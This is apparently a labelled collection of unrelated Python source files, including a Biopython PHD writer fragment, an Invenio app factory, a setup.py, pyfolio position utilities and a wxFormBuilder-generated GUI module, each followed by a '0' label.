len(peak_locations), "Number " + \ "of peak location scores does not match length of sequence" if None in phred_qualities: raise ValueError("A quality value of None was found") if record.description.startswith("%s " % record.id): title = record.description else: title = "%s %s" % (record.id, record.description) self.handle.write("BEGIN_SEQUENCE %s\nBEGIN_COMMENT\n" % self.clean(title)) for annot in [k.lower() for k in Phd.CKEYWORDS]: value = None if annot == "trim": if record.annotations.get("trim", None): value = "%s %s %.4f" % record.annotations["trim"] elif annot == "trace_peak_area_ratio": if record.annotations.get("trace_peak_area_ratio", None): value = "%.4f" % record.annotations[ "trace_peak_area_ratio"] else: value = record.annotations.get(annot, None) if value or value == 0: self.handle.write("%s: %s\n" % (annot.upper(), value)) self.handle.write("END_COMMENT\nBEGIN_DNA\n") for i, site in enumerate(record.seq): if peak_locations: self.handle.write("%s %i %i\n" % ( site, round(phred_qualities[i]), peak_locations[i]) ) else: self.handle.write("%s %i\n" % ( site, round(phred_qualities[i])) ) self.handle.write("END_DNA\nEND_SEQUENCE\n") if __name__ == "__main__": from Bio._utils import run_doctest run_doctest()
0
# -*- coding: utf-8 -*- """inspirehep application factories.""" import os import sys from invenio_base.app import create_app_factory from invenio_base.wsgi import create_wsgi_factory from invenio_config import create_conf_loader from . import config env_prefix = 'APP' config_loader = create_conf_loader(config=config, env_prefix=env_prefix) instance_path = os.getenv(env_prefix + '_INSTANCE_PATH') or \ os.path.join(sys.prefix, 'var', 'inspirehep-instance') """Instance path for Invenio. Defaults to ``<env_prefix>_INSTANCE_PATH`` or if environment variable is not set ``<sys.prefix>/var/<app_name>-instance``. """ static_folder = os.getenv(env_prefix + '_STATIC_FOLDER') or \ os.path.join(instance_path, 'static') """Static folder path. Defaults to ``<env_prefix>_STATIC_FOLDER`` or if environment variable is not set ``<sys.prefix>/var/<app_name>-instance/static``. """ create_api = create_app_factory( 'inspirehep', config_loader=config_loader, blueprint_entry_points=['invenio_base.api_blueprints'], extension_entry_points=['invenio_base.api_apps'], instance_path=instance_path, ) create_app = create_app_factory( 'inspirehep', config_loader=config_loader, blueprint_entry_points=['invenio_base.blueprints'], extension_entry_points=['invenio_base.apps'], wsgi_factory=create_wsgi_factory({'/api': create_api}), instance_path=instance_path, static_folder=static_folder, )
0
#!/usr/bin/env python import os import sys import requests_futures try: from setuptools import setup except ImportError: from distutils.core import setup if sys.argv[-1] == 'publish': os.system('python setup.py sdist upload') sys.exit() packages = [ 'requests_futures', ] requires = [ 'requests>=1.2.0' ] if sys.version_info < (3, 2): requires.append('futures>=2.1.3') setup( name='requests-futures', version=requests_futures.__version__, description='Asynchronous Python HTTP for Humans.', long_description=open('README.rst').read(), author='Ross McFarland', author_email='rwmcfa1@neces.com', packages=packages, package_dir={'requests_futures': 'requests_futures'}, package_data={'requests_futures': ['LICENSE', 'README.rst']}, include_package_data=True, install_requires=requires, license='Apache License v2', url='https://github.com/ross/requests-futures', zip_safe=False, classifiers=( 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Natural Language :: English', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.1', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', ), )
0
# # Copyright 2015 Quantopian, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import pandas as pd def get_portfolio_alloc(positions): """ Determines a portfolio's allocations. Parameters ---------- positions : pd.DataFrame Contains position values or amounts. Returns ------- positions_alloc : pd.DataFrame Positions and their allocations. """ return positions.divide( positions.abs().sum(axis='columns'), axis='rows' ) def get_long_short_pos(positions, gross_lev=1.): """ Determines the long amount, short amount, and cash of a portfolio. Parameters ---------- positions : pd.DataFrame The positions that the strategy takes over time. gross_lev : float, optional The porfolio's gross leverage (default 1). Returns ------- df_long_short : pd.DataFrame Net long, short, and cash positions. """ positions_wo_cash = positions.drop('cash', axis='columns') df_long = positions_wo_cash.apply(lambda x: x[x > 0].sum(), axis='columns') df_short = - \ positions_wo_cash.apply(lambda x: x[x < 0].sum(), axis='columns') # Shorting positions adds to cash df_cash = positions.cash.abs() - df_short df_long_short = pd.DataFrame({'long': df_long, 'short': df_short, 'cash': df_cash}) # Renormalize df_long_short /= df_long_short.sum(axis='columns') # Renormalize to leverage df_long_short *= gross_lev return df_long_short def get_top_long_short_abs(positions, top=10): """ Finds the top long, short, and absolute positions. Parameters ---------- positions : pd.DataFrame The positions that the strategy takes over time. top : int, optional How many of each to find (default 10). Returns ------- df_top_long : pd.DataFrame Top long positions. df_top_short : pd.DataFrame Top short positions. df_top_abs : pd.DataFrame Top absolute positions. """ positions = positions.drop('cash', axis='columns') df_max = positions.max() df_min = positions.min() df_abs_max = positions.abs().max() df_top_long = df_max[df_max > 0].nlargest(top) df_top_short = df_min[df_min < 0].nsmallest(top) df_top_abs = df_abs_max.nlargest(top) return df_top_long, df_top_short, df_top_abs def extract_pos(positions, cash): """Extract position values from backtest object as returned by get_backtest() on the Quantopian research platform. Parameters ---------- positions : pd.DataFrame timeseries containing one row per symbol (and potentially duplicate datetime indices) and columns for amount and last_sale_price. cash : pd.Series timeseries containing cash in the portfolio. Returns ------- pd.DataFrame Daily net position values. - See full explanation in tears.create_full_tear_sheet. """ positions = positions.copy() positions['values'] = positions.amount * positions.last_sale_price cash.name = 'cash' values = positions.reset_index().pivot_table(index='index', columns='sid', values='values') values = values.join(cash) return values def get_turnover(transactions, positions, period=None): """ Portfolio Turnover Rate: Average value of purchases and sales divided by the average portfolio value for the period. If no period is provided the period is one time step. Parameters ---------- transactions_df : pd.DataFrame Contains transactions data. - See full explanation in tears.create_full_tear_sheet positions : pd.DataFrame Contains daily position values including cash - See full explanation in tears.create_full_tear_sheet period : str, optional Takes the same arguments as df.resample. Returns ------- turnover_rate : pd.Series timeseries of portfolio turnover rates. """ traded_value = transactions.txn_volume portfolio_value = positions.sum(axis=1) if period is not None: traded_value = traded_value.resample(period, how='sum') portfolio_value = portfolio_value.resample(period, how='mean') # traded_value contains the summed value from buys and sells; # this is divided by 2.0 to get the average of the two. turnover = traded_value / 2.0 turnover_rate = turnover / portfolio_value return turnover_rate
0
# -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Oct 14 2017) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc import wx.html2 from beatle.lib import wxx from beatle import localpath import wx.richtext import wx.aui import wx.animate # special import for beatle development from beatle.lib.handlers import Identifiers ID_NEW_WORKSPACE = Identifiers.register('ID_NEW_WORKSPACE') ID_NEW_PROJECT = Identifiers.register('ID_NEW_PROJECT') ID_OPEN_WORKSPACE = Identifiers.register('ID_OPEN_WORKSPACE') ID_OPEN_PROJECT = Identifiers.register('ID_OPEN_PROJECT') ID_CLOSE_WORKSPACE = Identifiers.register('ID_CLOSE_WORKSPACE') ID_CLOSE_PROJECT = Identifiers.register('ID_CLOSE_PROJECT') ID_IMPORT_PROJECT = Identifiers.register('ID_IMPORT_PROJECT') ID_SAVE_WORKSPACE = Identifiers.register('ID_SAVE_WORKSPACE') ID_SAVE_PROJECT = Identifiers.register('ID_SAVE_PROJECT') ID_QUIT = Identifiers.register('ID_QUIT') ID_UNDO = Identifiers.register('ID_UNDO') ID_REDO = Identifiers.register('ID_REDO') ID_COPY = Identifiers.register('ID_COPY') ID_CUT = Identifiers.register('ID_CUT') ID_PASTE = Identifiers.register('ID_PASTE') ID_DELETE = Identifiers.register('ID_DELETE') ID_EDIT_OPEN = Identifiers.register('ID_EDIT_OPEN') ID_EDIT_CONTEXT = Identifiers.register('ID_EDIT_CONTEXT') ID_EDIT_USER_SECTIONS = Identifiers.register('ID_EDIT_USER_SECTIONS') ID_EDIT_PROPERTIES = Identifiers.register('ID_EDIT_PROPERTIES') ID_PREFERENCES = Identifiers.register('ID_PREFERENCES') ########################################################################### ## Class FontPreferences ########################################################################### class FontPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer78 = wx.FlexGridSizer( 2, 2, 0, 0 ) fgSizer78.AddGrowableCol( 1 ) fgSizer78.SetFlexibleDirection( wx.BOTH ) fgSizer78.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText44 = wx.StaticText( self, wx.ID_ANY, u"Defaul text font:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText44.Wrap( -1 ) fgSizer78.Add( self.m_staticText44, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_fontPicker = wx.FontPickerCtrl( self, wx.ID_ANY, wx.NullFont, wx.DefaultPosition, wx.DefaultSize, wx.FNTP_DEFAULT_STYLE ) self.m_fontPicker.SetMaxPointSize( 100 ) fgSizer78.Add( self.m_fontPicker, 0, wx.ALL|wx.EXPAND, 5 ) self.SetSizer( fgSizer78 ) self.Layout() def __del__( self ): pass ########################################################################### ## Class NavigatorPane ########################################################################### class NavigatorPane ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL|wx.WANTS_CHARS ) self.SetExtraStyle( wx.WS_EX_BLOCK_EVENTS ) self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNSHADOW ) ) self.SetBackgroundColour( wx.Colour( 0, 3, 135 ) ) fgSizer193 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer193.AddGrowableCol( 0 ) fgSizer193.AddGrowableRow( 1 ) fgSizer193.SetFlexibleDirection( wx.BOTH ) fgSizer193.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_url = wx.TextCtrl( self, wx.ID_ANY, u"aa", wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER|wx.SIMPLE_BORDER ) self.m_url.SetFont( wx.Font( wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_SLANT, wx.FONTWEIGHT_NORMAL, False, "Arial" ) ) self.m_url.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_3DDKSHADOW ) ) self.m_url.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BACKGROUND ) ) self.m_url.Hide() fgSizer193.Add( self.m_url, 0, wx.EXPAND, 5 ) self.m_page = wx.html2.WebView.New(self) fgSizer193.Add( self.m_page, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer193 ) self.Layout() # Connect Events self.m_url.Bind( wx.EVT_TEXT_ENTER, self.OnEnterUrl ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnEnterUrl( self, event ): event.Skip() ########################################################################### ## Class TasksPane ########################################################################### class TasksPane ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 731,300 ), style = wx.TAB_TRAVERSAL ) fgSizer91 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer91.AddGrowableCol( 1 ) fgSizer91.AddGrowableRow( 0 ) fgSizer91.SetFlexibleDirection( wx.BOTH ) fgSizer91.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_listCtrl2 = wx.ListCtrl( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT ) fgSizer91.Add( self.m_listCtrl2, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer92 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer92.AddGrowableCol( 0 ) fgSizer92.AddGrowableRow( 1 ) fgSizer92.SetFlexibleDirection( wx.BOTH ) fgSizer92.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer93 = wx.FlexGridSizer( 2, 4, 0, 0 ) fgSizer93.AddGrowableCol( 1 ) fgSizer93.AddGrowableCol( 3 ) fgSizer93.SetFlexibleDirection( wx.BOTH ) fgSizer93.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText50 = wx.StaticText( self, wx.ID_ANY, u"task", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText50.Wrap( -1 ) fgSizer93.Add( self.m_staticText50, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl34 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer93.Add( self.m_textCtrl34, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText51 = wx.StaticText( self, wx.ID_ANY, u"status", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText51.Wrap( -1 ) fgSizer93.Add( self.m_staticText51, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice20Choices = [ u"pending", u"doing", u"done", wx.EmptyString, wx.EmptyString, wx.EmptyString ] self.m_choice20 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice20Choices, 0 ) self.m_choice20.SetSelection( 0 ) fgSizer93.Add( self.m_choice20, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText52 = wx.StaticText( self, wx.ID_ANY, u"priority", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText52.Wrap( -1 ) fgSizer93.Add( self.m_staticText52, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice21Choices = [ u"High", u"Normal", u"Low" ] self.m_choice21 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice21Choices, 0 ) self.m_choice21.SetSelection( 1 ) fgSizer93.Add( self.m_choice21, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText53 = wx.StaticText( self, wx.ID_ANY, u"type", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText53.Wrap( -1 ) fgSizer93.Add( self.m_staticText53, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice22Choices = [ u"BUG", u"CHANGE", u"IMPROVE" ] self.m_choice22 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice22Choices, 0 ) self.m_choice22.SetSelection( 1 ) fgSizer93.Add( self.m_choice22, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer92.Add( fgSizer93, 1, wx.EXPAND, 5 ) sbSizer22 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Comments" ), wx.VERTICAL ) self.m_richText16 = wx.richtext.RichTextCtrl( sbSizer22.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer22.Add( self.m_richText16, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer92.Add( sbSizer22, 1, wx.EXPAND|wx.BOTTOM|wx.RIGHT|wx.LEFT, 5 ) fgSizer91.Add( fgSizer92, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer91 ) self.Layout() def __del__( self ): pass ########################################################################### ## Class BuildBinaries ########################################################################### class BuildBinaries ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer102 = wx.FlexGridSizer( 5, 3, 0, 0 ) fgSizer102.AddGrowableCol( 1 ) fgSizer102.SetFlexibleDirection( wx.BOTH ) fgSizer102.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText65 = wx.StaticText( self, wx.ID_ANY, u"C++ compiler:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText65.Wrap( -1 ) fgSizer102.Add( self.m_staticText65, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl41 = wx.TextCtrl( self, wx.ID_ANY, u"g++", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl41, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.EXPAND, 5 ) self.m_bpButton3 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton3, 0, wx.ALL, 5 ) self.m_staticText66 = wx.StaticText( self, wx.ID_ANY, u"shared libraries linker:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText66.Wrap( -1 ) fgSizer102.Add( self.m_staticText66, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl411 = wx.TextCtrl( self, wx.ID_ANY, u"g++", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl411, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton31 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton31, 0, wx.ALL, 5 ) self.m_staticText67 = wx.StaticText( self, wx.ID_ANY, u"static libraries linker:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText67.Wrap( -1 ) fgSizer102.Add( self.m_staticText67, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl4111 = wx.TextCtrl( self, wx.ID_ANY, u"ar", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl4111, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton311 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton311, 0, wx.ALL, 5 ) self.m_staticText651 = wx.StaticText( self, wx.ID_ANY, u"make:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText651.Wrap( -1 ) fgSizer102.Add( self.m_staticText651, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl41111 = wx.TextCtrl( self, wx.ID_ANY, u"make", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl41111, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton3111 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton3111, 0, wx.ALL, 5 ) self.SetSizer( fgSizer102 ) self.Layout() def __del__( self ): pass ########################################################################### ## Class WebPreferences ########################################################################### class WebPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer61 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer61.AddGrowableCol( 0 ) fgSizer61.AddGrowableRow( 0 ) fgSizer61.AddGrowableRow( 1 ) fgSizer61.SetFlexibleDirection( wx.BOTH ) fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) connection = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"connection" ), wx.VERTICAL ) self.m_radioBtn4 = wx.RadioButton( connection.GetStaticBox(), wx.ID_ANY, u"Automatic network configuration", wx.DefaultPosition, wx.DefaultSize, 0 ) connection.Add( self.m_radioBtn4, 0, wx.ALL, 5 ) self.m_radioBtn5 = wx.RadioButton( connection.GetStaticBox(), wx.ID_ANY, u"Manual proxy settings", wx.DefaultPosition, wx.DefaultSize, 0 ) connection.Add( self.m_radioBtn5, 0, wx.ALL, 5 ) fgSizer62 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer62.AddGrowableCol( 1 ) fgSizer62.AddGrowableRow( 2 ) fgSizer62.SetFlexibleDirection( wx.BOTH ) fgSizer62.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer62.AddSpacer( ( 40, 0), 1, wx.EXPAND, 5 ) fgSizer63 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer63.AddGrowableCol( 1 ) fgSizer63.SetFlexibleDirection( wx.BOTH ) fgSizer63.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.st_http_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"http proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_http_proxy.Wrap( -1 ) self.st_http_proxy.Enable( False ) fgSizer63.Add( self.st_http_proxy, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_http_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_http_proxy.Enable( False ) fgSizer63.Add( self.m_http_proxy, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer62.Add( fgSizer63, 1, wx.EXPAND, 5 ) fgSizer62.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.m_checkBox6 = wx.CheckBox( connection.GetStaticBox(), wx.ID_ANY, u"use same proxy for all protocols", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_checkBox6.SetValue(True) self.m_checkBox6.Enable( False ) fgSizer62.Add( self.m_checkBox6, 0, wx.ALL, 5 ) fgSizer62.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer631 = wx.FlexGridSizer( 2, 2, 0, 0 ) fgSizer631.AddGrowableCol( 1 ) fgSizer631.SetFlexibleDirection( wx.BOTH ) fgSizer631.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.st_https_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"https proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_https_proxy.Wrap( -1 ) self.st_https_proxy.Enable( False ) fgSizer631.Add( self.st_https_proxy, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_https_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_https_proxy.Enable( False ) fgSizer631.Add( self.m_https_proxy, 0, wx.ALL|wx.EXPAND, 5 ) self.st_ftp_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"ftp proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_ftp_proxy.Wrap( -1 ) self.st_ftp_proxy.Enable( False ) fgSizer631.Add( self.st_ftp_proxy, 0, wx.ALL, 5 ) self.m_ftp_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_ftp_proxy.Enable( False ) fgSizer631.Add( self.m_ftp_proxy, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer62.Add( fgSizer631, 1, wx.EXPAND, 5 ) connection.Add( fgSizer62, 1, wx.EXPAND, 5 ) fgSizer61.Add( connection, 1, wx.EXPAND, 5 ) self.m_button4 = wx.Button( self, wx.ID_ANY, u"Apply", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_button4.Enable( False ) fgSizer61.Add( self.m_button4, 0, wx.ALL|wx.ALIGN_RIGHT, 5 ) self.SetSizer( fgSizer61 ) self.Layout() # Connect Events self.m_radioBtn4.Bind( wx.EVT_RADIOBUTTON, self.OnAutoNetwork ) self.m_radioBtn5.Bind( wx.EVT_RADIOBUTTON, self.OnManualProxy ) self.m_http_proxy.Bind( wx.EVT_TEXT, self.OnChangeHttpProxy ) self.m_checkBox6.Bind( wx.EVT_CHECKBOX, self.OnSameProxy ) self.m_https_proxy.Bind( wx.EVT_TEXT, self.OnChangeHttpsProxy ) self.m_ftp_proxy.Bind( wx.EVT_TEXT, self.OnChangeFtpProxy ) self.m_button4.Bind( wx.EVT_BUTTON, self.OnApply ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnAutoNetwork( self, event ): event.Skip() def OnManualProxy( self, event ): event.Skip() def OnChangeHttpProxy( self, event ): event.Skip() def OnSameProxy( self, event ): event.Skip() def OnChangeHttpsProxy( self, event ): event.Skip() def OnChangeFtpProxy( self, event ): event.Skip() def OnApply( self, event ): event.Skip() ########################################################################### ## Class HelpPreferences ########################################################################### class HelpPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 616,334 ), style = wx.TAB_TRAVERSAL ) sbSizer14 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"help items" ), wx.VERTICAL ) fgSizer65 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer65.AddGrowableCol( 0 ) fgSizer65.AddGrowableRow( 0 ) fgSizer65.SetFlexibleDirection( wx.BOTH ) fgSizer65.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_help_items = wx.ListCtrl( sbSizer14.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_AUTOARRANGE|wx.LC_NO_HEADER|wx.LC_REPORT|wx.LC_SINGLE_SEL ) fgSizer65.Add( self.m_help_items, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer66 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer66.AddGrowableCol( 0 ) fgSizer66.AddGrowableRow( 3 ) fgSizer66.SetFlexibleDirection( wx.BOTH ) fgSizer66.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_new_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer66.Add( self.m_new_btn, 0, wx.ALL|wx.EXPAND, 5 ) self.m_edit_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"Edit", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_edit_btn.Enable( False ) fgSizer66.Add( self.m_edit_btn, 0, wx.ALL|wx.EXPAND, 5 ) self.m_del_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_del_btn.Enable( False ) fgSizer66.Add( self.m_del_btn, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer65.Add( fgSizer66, 1, wx.EXPAND, 5 ) sbSizer14.Add( fgSizer65, 1, wx.EXPAND|wx.ALL, 5 ) self.SetSizer( sbSizer14 ) self.Layout() # Connect Events self.m_help_items.Bind( wx.EVT_LIST_ITEM_ACTIVATED, self.OnEnterItem ) self.m_help_items.Bind( wx.EVT_LIST_ITEM_DESELECTED, self.OnDeselectItem ) self.m_help_items.Bind( wx.EVT_LIST_ITEM_SELECTED, self.OnSelectItem ) self.m_new_btn.Bind( wx.EVT_BUTTON, self.OnNewItem ) self.m_edit_btn.Bind( wx.EVT_BUTTON, self.OnEditItem ) self.m_del_btn.Bind( wx.EVT_BUTTON, self.OnDeleteItem ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnEnterItem( self, event ): event.Skip() def OnDeselectItem( self, event ): event.Skip() def OnSelectItem( self, event ): event.Skip() def OnNewItem( self, event ): event.Skip() def OnEditItem( self, event ): event.Skip() def OnDeleteItem( self, event ): event.Skip() ########################################################################### ## Class NewHelpItem ########################################################################### class NewHelpItem ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New help item", pos = wx.DefaultPosition, size = wx.Size( 568,252 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer125 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer125.AddGrowableCol( 0 ) fgSizer125.AddGrowableRow( 0 ) fgSizer125.AddGrowableRow( 2 ) fgSizer125.SetFlexibleDirection( wx.BOTH ) fgSizer125.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer125.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer126 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer126.AddGrowableCol( 1 ) fgSizer126.SetFlexibleDirection( wx.HORIZONTAL ) fgSizer126.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText85 = wx.StaticText( self, wx.ID_ANY, u"menu label:", wx.DefaultPosition, 